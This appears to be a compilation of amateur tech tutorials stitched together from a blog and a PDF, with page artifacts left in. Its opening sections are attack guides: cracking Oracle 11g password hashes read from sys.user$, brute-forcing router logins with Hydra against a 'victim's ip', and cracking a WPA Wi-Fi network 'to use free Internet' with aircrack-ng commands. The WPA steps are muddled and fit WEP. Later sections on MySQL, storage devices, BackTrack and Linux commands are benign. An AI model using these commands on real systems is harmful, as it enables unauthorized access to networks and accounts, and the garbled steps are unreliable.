How to Cracking Oracle 11g

Download Windows Binary: thc-orakelcrackert11g.tar.gz

OrakelCrackert 1.00 released 20070926
OrakelCrackert is an Oracle 11g database password hash cracker using a 
weakness in the Oracle password storage strategy. With Oracle 11g, case 
sensitive SHA1 based hashing is introduced. Storing passwords in a case 
sensitive way introduces more possible password combinations so 
password cracking takes longer. For example, the number of possible 
password combinations using a password generated out of the character 
set "[a-z][A-Z][0-9]#$_" where passwords start with a alpha character 
using is 52/65 * 65 ^ passlength. For an 8 position password this means 
254.915.850.312.500 combinations.

Since Oracle is still storing the DES based password hashes, an attack 
much faster than brute forcing can be launched for most (not all) 
passwords. To do so:

1 - Get both the Oralce < 11g and 11g password hash, for example by 
executing the query "select user, password, spare4 from sys.user$ where 
username = ".

2 - Crack the old DES based password hash (field "password") which is 
generated using the upper case version of the mixed case password 
(note: this is not applicable to all possible passwords in Oracle 11g).

3 - If the upper case password is found, calculate the SHA1 result of 
the ASCII value of the password followed by the salt (nibble 41-60 of 
field SPARE4) to the SHA1 based password hash (nibble 1-40 of field 
SPARE4). Do this for every upper/lower case combination possible until 
you have got a match.

4 - Voila!

Using a password generated out of the character set 
"[a-z][A-Z][0-9]#$_" where passwords start with a alpha character 
(currently supported by OrakelCrackert), the number of password 
combinations shrinks to 26/39 * 39 ^ length (= step 2) + 2 ^ length (= 
step 3). A full brute force for an 8 position password will now at 
maximum 'just' take 3.568.006.173.910 tries. This is about 77 times 
less than the original value.

select name, password, spare4 from sys.user$ where name = 'THC';


With real-life data:
USER_PASS = ASCII(THC + THC#) = 0x54484354484323
PASS_UPPER = ORACLEHASH(0x54484354484323) = 0x435D0D3C8468DBC4
FOR LOOP (only the correct guess):
	PASS_SALT = ASCI(tHC# + 0x02B03D5D74B6841CEA2E) = 
	GUESSED_CASE = SHA1(0x7448432302B03D5D74B6841CEA2E) = 
	IF(0xD39F4CC16573323279E5E4E16D359D6C55DCC092 == 

How to use Hydra

Say you have wireless router to which you have forgotten the password. The easiest thing to do in this case is
to reset the router to factory defaults. However if you have a lot of custom settings and your backup is
nonexistent, out-dated, corrupted, or the backup restored a password which you do not remember, you can
try a brute force attack on the router. From Hydra currently supports:
SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, SSH2, Teamspeak, Cisco auth, Cisco enable,
Cisco AAA (incorporated in telnet module)
For the sake of this document I will use a Linksys WRT54GL, hardware v1.1, Linksys firmware 4.30.11 and
dd-wrt v2.4sp1. The first thing you have to do is find out if the device uses a username AND password to
login. Several devices only require a password to login into the device as admin, root, system, etc. The easiest
way to find this out is to goto the vendor’s website and download installation manual which willgive you this
information. For the Linksys firmware
boot BackTrack and login as root 1.
hydra -l “” -P wordlist.txt -f -v -e ns http-get /
-l is for a username which is null in this case
-P is a wordlist of passwords to try
-f stop hydra when it finds the password
-v is for verbose
-e try no password and password the ip address of the device one of the currently supported options is the IP of the AP
http-get is the correct option to this AP
/ is where you have to put in the username and password. In this case you have to put in the username
and password before you can do anything. You will have to figure this out for yourself as each device is
some other option you may need are:
-t TASKS run TASKS number of connects in parallel (default: 16)
You may have to adjust this number down as larger numbers may cause the router to crash or
misbehave. I usually use 10.
-v / -V verbose mode / show login+pass combination for each attempt
As I said earlier, http-get is the correct option for my Linksys AP (with the factory firmware). When you goto
the AP website a dialog box opens and prompts for a username and password. Each AP is different and as
Cracking Passwords Version 1.1 file:///D:/password10.html
23 of 45 2/15/2010 3:48 PM
such you will have to change options as RaginRob found out. The following is a slightly modified version
from his tutorial.
I recently started playing around with Hydra and tried to hack my router. After searching the forum and
googling around a while I noticed that there are only some howto’s for routers that have http-auth
authentication. That is, when you go to e.g. and before showing anything you have to enter login
and password in a popup. My router (T-Com Sinus 154 DSL Basic 3) and many others I’ve dealt with so far
work differently. When I want to login to my router, I have to go to, a web interface with a
password field shows up, and I have to enter the password which is then checked by /cgi-bin/login.exe via
It was quite tricky to find out how to use this authentication with hydra, so I guess there are some of you that
can benefit from this. I’ll describe how I did it, so you can adapt the method and use it with your own router.
First of all I examined the login page of the web interface. Be sure to look at the frame source and not the
frameset. You should see the form and the action, here’s what I saw:
The form is defined as:
<form name=”tF” method=”post” action=”/cgi-bin/login.exe” onSubmit=”evaltF();”>
Somewhere in the form there will be the field that takes the password:
<input type=”password” name=”pws” class=”stylepwd” size=”12″ maxlength=”12″>
This is probably the most important data you need. You need to write down the field name (“pws” in my
case). The size attribute comes in very handy too because it tells us that the password’s max length is 12
After that I tried to get familiar with Hydra’s options. I figured out that you needthe following options:
hydra -l “” -P passwords.txt -t 1 -f -v -V http-post-form /cgi-bin
-l Sets the login name. In the end I don’t need a login name but hydra gets kind of pissed when you don’tpass
something, so I gave an empty string.
-P The wordlist to use for the password
-t 1 task only, not really necessary, I just wanted to make sure Hydra doesn’t choke on too many requests -f
Hydra shall stop when a working password is found
-v be verbose. and even more. I skipped that in the final version but it’s ok for debugging is victim’s ip
http-post-form the method to use
This is the most important part. Here we tell Hydra what to pass the passwords to. The argument consists of
three parts separated by “:”.
The first part is the script that takes the POST data, we found that in the frame source above.
The second part is the field name of the password field with an added =^PASS^. ^PASS^ is the variable that
hydra substitutes with the passwords in the wordlist.
The third part is the “incorrect” condition. Hydra has to find out somehow if the current password that was
send to the router is correct or not. You have to find a string that is actually IN A NEGATIVE RESPONSE
from the router. As we don’t have the password yet we can’t know what the router will send if the password is
correct, therefore we have to check if it is NOT, which we can find out easily. To find out what the router
sends back to hydra I used Wireshark.
Cracking Passwords Version 1.1 file:///D:/password10.html
Open up wireshark, go to the router login page, start capturing and then login with a wrong password. After
that, stop capturing and apply a “http” filter. You will see the POST data sentfrom hydra to the router (you
should also see the “pws=blabla” in the details, that’s where hydra sends the passwords from the wordlist).
Below that you’ll find the router answer. In my case it says something like “This page has moved to
loginpserr.htm” packed in some basic HTML. So I used the string loginpserr.htm to validate the .. uhm…
faultyness. OMFG %-]
Hydra will consider a password as CORRECT when the router answer DOES NOT contain the given string.
So be sure to take an expression that somehow sounds like “incorrect” or “wrong”. If you took “the” for
example, and the POSITVE response would be something like “the password you entered was correct”, hydra
will not recognize it as correct but incorrect.
If your router does not only need a password but also a username, you can easily add the according login
name to the last part. So if you need to send the field “login” or whatever it is called in your case with the
value “admin” as the only username you could use
When you need to try a whole username list then you can specify the list via
-L usernames.txt
For dd-wrt do
boot BackTrack and login as root 1.
hydra -l admin -P wordlist.txt -f -e ns http-get /login.asp
-l is for a username which is admin in this case. dd-wrt allows the user to chose the username that is
require to login to the device so it could be anything.
-P is a wordlist of passwords to try
-f stop hydra when it finds the password
-v is for verbose
-e try no password and password the ip address of the device one of the currently supported options is the IP of the AP
http-get is the correct option to this AP
/ is where you have to put in the username and password. In this case you have to put in the username
and password before you can do anything. You will have to figure this out for yourself as each device is
some other option you may need are:
-t TASKS run TASKS number of connects in parallel (default: 16)
You may have to adjust this number down as larger numbers may cause the router to crash or
misbehave. I usually use 10.
-v / -V verbose mode / show login+pass combination for each attempt

END of hydra

How to use my MySQL Server”Basics”

MySQL is a database to store the user information MySQL is free and Opensource  it is very easy to use,SQl stand for “structure query language.”

What is Database ?

This is one of the hardest topic to define but i will enplane you as easy as possible lets go, imagine an excel sheet on your mind then divide them into rows and columns and give the row a name like a,b,c,d and give the columns 1,2,3,4 then i want you to store “apple” in a1 if you did it then when you need a apple you would go to a1. this is like an array where the data is stores in specific memory and then pointing that memory to access that data.if you understand this then you know what is a database, a database is used to store large amount of data then application or web pages  use that database to access that data,a user can store there picture,music in a database a user can also password protect the data in a database.

How to install Mysql ?

To install MySQL Server on a windows here is the process you can choose your platform.

  • Download MySQL by visiting here .
  • Download the MySQL windows installer.
  • after Downloading install it on the computer.
  • Locate the directory where MySQL is installed and open it up.

after the above process it would open a console window ,type in password if you have entered any  in the installation lets get started to use MySQL first enter the “help” command basically it will print the list of MySQL commands. To see the Databases enter this command “show databases;”   remember to put semi-colon at the end of the command or statement because it means the command or statement has ended.after typing this command you will see some databases that are created to use these databases we will use the “use” command and the name of the database(e.g. use test).to see tables inside the database we will use the “show tables;” remember we are using the test database, To see which database are you using use the “status;” command to see the current status of the database.under the current database you can see your current database that you are using.this command also shows which database server are you using which TCP port are you using and many more create a database we will use “create database” command and the name of the database (e.g.”create database hello;”) this will create a hello database to see your database type the “show databases” command,To delete a database we will use the “drop database” command and the name of the database(e.g.”drop database hello“)this will completely remove every thing of the database that you have chosen remember to use this command with use our database that we have created we will then again use the “use” command.Let’s create a Table if you don’t know what is a table you can think of this way think a folder is a database and the files inside that folder are tables,to create a table we will use the ‘create’ command,(e.g.”create table infor (name varchar(25), address varchar(100), age int, pnumber varchar(12));”)so it will create a fields named info and inside that it will create varchar(variable character) which is 25 character long and it will create another varchar which is 100 character long then  int(integer) age and then varchar which is 12 character see your tables that you have created type the “show tables” command it will the show your tables.if you want to see the content of  the infor table use the “describe” command and the name of the table(e.g.”describe infor;”)to erase a table we will use the “drop” command and the name of the table(e.g.”drop table infor”).to insert something in to a table for example our name, address etc.. we will use the “insert into” command and the name of the table.(e.g.”insert into infor values (“sik”, ” fake address”, 14, “5555-555-103”); “) remember string would be in quotes.after that we will select every thing using the “select * from” command and the name of the table(e.g.”select * from infor“) it will basically select every thing from infor table that is inside the “hello” database.if you want to see only address not the name and any other fields the we will use “select”command name of the field and the table name (e.g.”select address from infor”)it will echo the address that is stored in delete something from the table we will use the “delete from” command and table name then we will type “where” and the name of the field which is equal to content in the field.(e.g.”delete from infro where address=” fake address”).then enter this command “select * from infor” to see if the fake address has deleted or not.

End of MySQL Basics.

How to crack a WPA encypted wifi Network.

 To crack a WPA encrypted wifi Network to use free Internet, you will need is compatible wifi card and backtrack 5.
First download Backtrack 5 from here.
Download the iso and burn it into a DVD or you can run on virtual Machine in this case i am using Vmware to Run backtrack.

So run the backtrack 5 after that you will see the Desktop then open command terminal and type “airmon-ng” this command will show your interface driver and chip set of your network card.

Then type this command “airmon-ng start wlan0” wlan0 is the name of my interface.

Then you will see at the bottom left corner (monitor mode enable on mon0) so i am using mon0 as my interface after that type this command “airodump-ng mon0” then i will start scanning for wifi networks, after that you will see bssid  channel, encryption, essid etc. my essid is “homenet” your will be different after that type this command “airodump-ng -c (channel) -w (file name) –bssid (bssid) mon0” type your bssid, channel and filename
e.g. airodump-ng -c 3 -w wep –bssid 00:18:01:a7:c0:00 mon0
then press enter

then data will flow slowly so to boost the data,
open up a new command terminal and type “aireplay-ng -1 0 -a (bssid) mon0” if you have strong signals coming from the wifi card the you will see this Association Successful

then type this “aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0” then data will flow much faster if you see Use this  packet press y and press enter,

after that open a another command terminal and type “aircrack-ng (filename)*.cap” and press enter, then it will try to crack it now. Then it will say Key found and the key is 12:34:56 coll ans are not the part of the password so remove it.

so Know you have the wireless password Remember to use this Knowledge for good not for evil be ethical.

Commands that i have used

2)airmon-ng start wlan0
3)airodump-ng mon0
4)airodump-ng -c (channel) -w (file name) –bssid (bssid) mon0
5)aireplay-ng -1 0 -a (bssid) mon0
6)aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
7)aircrack-ng (filename)*.cap

Storage Devices

In this topic we will discuss about Storage Devices and backup media which are as fallows

– HDD (hard Drive Disk)

  • Solid-State Disk
  • Magnetic Disk

-FDD (floppy Drive disk)

Optical Drives

  • CD
  • DVD
  • RW
  • blu-Ray

-Removable Stroage

  • Flash Drives(SD CARD, thumb drives, USB, Flash)
  • External CD-RW and hard-drive
  • Tape Drive
  • HOT & Non- Hot Swappable devices.

FDD (floppy Drive Disk)

in these days FDD does not use to much and they are very hard to fine Fdd comes in many different sizes and Memory the most popular is the 1.44 Megabytes (MB) an a 3.5 (90mm) disk.

some Computer have built in Floppy drive but some Computer dose not if you have floppy and you need to connect it with a modern Computer that dose not have a floppy drive then you will probably need a USB  floppy drive .in  floppy drive you can save data that are 1.44  MB in memory floppy drive contain magnetic disk to store data know a days people flash dive to store data in Gigabyte’s that why floppy drive are not use to much .


What is HDD ?

HDD (Hard-drive disk)

hard drive are used to store  an write data they are connected to mother Board or Main board operating System and programs are stored inside the hard drive they are 3 types of hard drive SATA & ATA, PATA, Scuzzy Drive  or SCSI Drive.

SATA (Serial Advanced Technology Attachment) & ATA

Modern computer use ATA drive to store large amount of data.

PATA or IDE Drive

PATA or IDE drive are old and not use to much in computer.

SCSI (Small Computer System interface)

SCSI drives offer faster data transfer speeds than it competitors ATA and IDE. Although ATA and IDE are common for desktop users, these drives do not offer as many features as SCSI which can foster the connection of multiple interfaces.

How Hard Drive Works ?

Hard drive is made of metal and it is very strong hard drive are tightly pack so no dust particles can get it hard drive contain a “platter” in which the data is stored this platter is a magnetic disk,data written and read by”head”,the “arm” move the head back and forth to write the data or read in the “platter”, the platter is move by “spindle” ,An “Actuator” is responsible for the move meant of the arm.So the spindle is spinning the platter and the actuator is reading  and writing  binary’s in the platter.Data are arrange in track in a platter,there are many track on a platter and track contain sectors a sector contain 512 byte’s of information there are million of sectors on a  platter, and those sectors make up the cluster.

SSD or Solid State Disk.

Solid state Disk is modern technology of storing data it is very fast and last longest then any other storing devices, a Solid State Disk contain Flash chips to store data,but hard drive use platter to store data solid state is much expensive the hard drive.

A hard Drive needs to know where to start the system it uses master boot record or MBR it is the first sector of the hard drive, in that tiny little sector boot signature and booting info stored it also contain info for your operating system for where to boot from,if your operating system does’t boot up then there is a problem in the MBR this problem can be fix by rewriting the MBR.

Optical Drives

CD or Compact disk are use to store data and to share it with others it is circular disk a cd has a storing capacity of 700mb.

DVD or Digital Versatile Disk  are used in the same way as CD but it can store a large amount of data as compare to cd. A dvd has a storing capacity of 4.4 Gb for Single layer and 8.5 Gb for dual layer.

Blu-ray Disk are used for sharing data but it has a lot of storage capacity a single layer blu-ray Disk has a storing capacity of 25 Gb and dual layer has a storing capacity of 50 is expensive then the other disk as it can store a large amount of data.

Removable Storage 

Removable Storage are very useful for storing data,we can store data in Flash Drive or Memory stick and can plug and remove from the system and can plug into another system.


SD card are very small in size and can store large amount of data they are commonly used in cell phones, cameras,audio devices etc SD card comes in many different shapes and also with different storage capacity.

External Hard-drive

External hard drive are very useful if you need to transfer data from one computer to another. External hard drive have a usb port and a power connection but there are also external hard drive multi adapter where a user can connect ide or sata into that adapter and then connect’s the hard drive or Disk Drive then plug-in a usb cable in to a computer it is very useful if you have a laptop.

Multi External Drive Adapter

Tape Drive

Tape Drive are very use full if you have large scale of data it commonly used in industry or company to store a huge amount of data a user can use a tape drive to copy or backup all the data of all the computer or server automatically at night so if something happens then user can recover that data it also store data in a encryption so other people can’t access the data,a tape drive contain a magnetic tape where the data is stored it can contain up to 16 ,32 or more tape disk so users’s can save a lot of data.

End of Storage Chapter

How to Create a Free Website in 5 minutes.

Well you are probably wondering how would you make website in 5 minutes, if you fallow the steps you would have your own website in 5 min for free.

first we will get a domain name a domain name is the name of the website(e.g

to get a free domain visit and click on signup to create an account enter your personal information and click register know after that you are promoted with an email verification after verifying your account you can login in to your account, at the left side of the web page click on new project to set up your domain name; You will see 2 option Create redirect, Web space in this case click on web space so we can store our web pages in it, give the project a name and a description and choose your desire categories and hit Next then you will see a box that says enter a domain name give your desire name (  and hit next after few seconds your domain would be set up.

at bottom of  the web page you can see the ftp information if you don’t know what is a ftp it is file transfer protocol which is used to transfer file from the server to client. we would use an online ftp

client to send our webpages visit ftplive and copy your ftp information and paste it in to the text boxes and hit launch ftp browser after that you will see a file browser ,click on the www directory this is the folder in which we will upload our web pages to upload a web page click on browse select your html file or php file if you don’t know HTML or php you can learn it from w3schools .after uploading a web page visit your domain name and you can see  your website after few days your website would be index into search engines like bing, all it

How to install backtrack and how to customize it plus installing ubuntu Software Center.

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to install backtrack you need to download it from choose your flavour (i am choosing gnome) and download it once you have download the iso you can alos run it on virtualbox or vmware or you can burn it on to dvd or usb Flash this case i am using DVD burn the bootable iso into a DVD with windows burner or use any kind of iso extracting  Software. i assume that you have burn it, then reboot the computer then a backtrack boot screen well come choose to run in defult text mode then a processing screen well came after that it will ask you for a user name and password user name is “root” and password is “toor”

after entering this backtrack desktop will open,there will be an icon to install backtrack on the desktop to install backtrack into the harddrive or to dual boot it with windows or any operating system click on the icon then a language screen will come choose the your language and click forward.

then it will ask your location and time zone give your defult location and TimeZone


Then choose the keyBoard layout and click forward




i am choosing Forward then prepare disk space screen will appear


if you whant o erase entire disk then choose the first Radio Button if you whant to install in Separate partion or to embed it with windows then choose the second Radio Button Agust the size of your Operating System and click forward then prepare partion screen will come


you can create,choose, format or delete the partion in this screen do what ever you like after that click Forward then Who are you screen will appear enter you login info and click forward.

then install screen will appear click install to install Backtrack in the harddrive.after that it will restart. after that backtrack will load from the harddrive if you have dual boot it with windows then you will see the choose operating System screen you can choose what ever operating system to boot

choose backtrack in this case(backtrack is ubuntu base operating system if you see ubuntu instead of backtrack don’t worrie its normal)then it will boot from the harddrive then enter username and passwaord that you have enter,

After that backtrack Desktop will appear you have at this point you have install backtrack successfully.



How to install Software Center to install application into backtrack?



Software Center is easy to use tool that helps user to install or to unstall software from there linux Distro.To install Ubuntu Software Center into BackTrack, then open the terminal

inside the terminal enter this line of command “apt-get install software-center” to Download and install Software Center intside the BackTrack (requires internet Connection).


It will ask that do you whant to continue or not, press y and hit enter to continue installation.

after that close the terminal.Then click on application which is located at left up,left of the desktop you will see ubuntu Software Center “open it”.

Then ubuntu Software Center will open


Type unity in the search menu and click install after that type “dock” and install avant Windows navigator or you can choose Docky.

when install make it you startup application to do that fallow the image

it will opeen startup program window click on add and type the name of the program and browse the location of the program.when you next time boot the operating system it will open the same program that you have can also change the theme by slecting Appearance from the system>Preferences choose the them you change Wallpaper left mouse click and slect change backgraound choose the location of the image file then backtrack will automatically change the backgraound of the can also install compiz from the Software Center and many other application for education or Developing.

Backtrack is same as Ubuntu the only difference is that backtrack has alot of crcking and hacking tools and other cool stuff.

How to boot and run linux from USB Flash drive.

To boot linux from usb flash drive you need a USB Flash Drive around 2GB and you need to download some of the following Software.

1==>Download Universal USB Installer from here.

2==>Download a linux distro in this case i am using Kubuntu .

after that run the Universal USB Installer then it will ask you to agree the License Agreement click “a Agree” to agree the license agreement after that setup your slections page will appear

Then select your linux Distro that you have Downloaded e.g. “kubuntu”

Browse the linux distro that you have downloaded e.g.”kubuntu-11.10-desktop-i386″

Then Slect USB Drive the e.g.”H”

Then click “Create” to extract the content of the iso into the USB Flash Drive.

This process will take 4 or 5 minutes after that it will say completed “click cancel to close the  window” then restart the computer “Rember to plug the USB Drive into the computer”

then a boot screen will show(if boot screen dosen’t show go to your bios and select boot option and change to usb first or  you can go to boot option and select the USB Drive to boot )

Select Run linux to run the linux Operating System.

Know you run linux operating system from your USB Flash Drive .

How to use linux Commands.

To use Linux commands you need to understand the Linux command terminal or Linux Shell as some say, to start using Linux commands open the Shell or the command terminal you would see a console window in that window you type the Linux commands to do your works some Linux commands are as fallows.


File Commands

  • ls – Directory listing
  • ls -al -Show listing with hidden files
  • cd dir – change directory to dir
  • cd- change to home
  • pwd – show current directory
  • mkdir file – create a directory with a name file
  • rm file – remove a file
  • rm -r file – delete a directory file
  • cp file1 file 2 – copy file1 to file2
  • touch file – create a file
  • cat > file – places stander input into file

System Commands

  • date – show the current date and time
  • cal -show the calender
  • uptime – show current up time
  •  w – display who is online
  • whoami – who you are logged in as
  • finger user – display information about user
  • uname -a – show kernel information
  • cat /proc/cpuinfo – shows cou information
  • cat /proc/meminfo – shows memory information
  • man command – shows manual of a command
  • free – show memory and swap usage

Net Work

  • ping host – ping host and output the results
  • whois domain – get the information for the domain
  • dig domin – get DNS information for the domain
  • wget -x host – reverse look up host
  • wget file – download a file
  • wget -c file – continue a stopped download


  • install from source file
  • ./configure  – software configurations
  • make
  • make install – install the software
  • dpkg -i pkg.deb – install a debian package
  • rmp -uvh pkg.rpm – install a package (Rpm)

Process management


  • ps – display currently active processes
  • top – display all  running processes
  • kill – kill process
  • killall – kill all process

Search Commands

  •  grep pattern files – search for patterns in files
  • locate file – find all instances of files

Face Recognition “lock the PC”

Face Recognition is a method for recognition images and face of animal or human, there are a lot of face recognition Software on the internet.Some face recognition Software help you to lock your computer or password protect it to unlock the Computer you need to view the image or face in-front of the camera.there is Software that i have use to do that its called “Key Lemon” to download the Software visit and click download after downloading it install it on the Computer after installing it click on the icon of the key lemon Software then click on settings and create a new model and also enter your desire password and click on update model,When ever you lock your computer it will show you the face recognition System instead of user logon Screen.

view your face in front of the camera and the Software will allow you the access if i doesn’t recognition your face type in the password.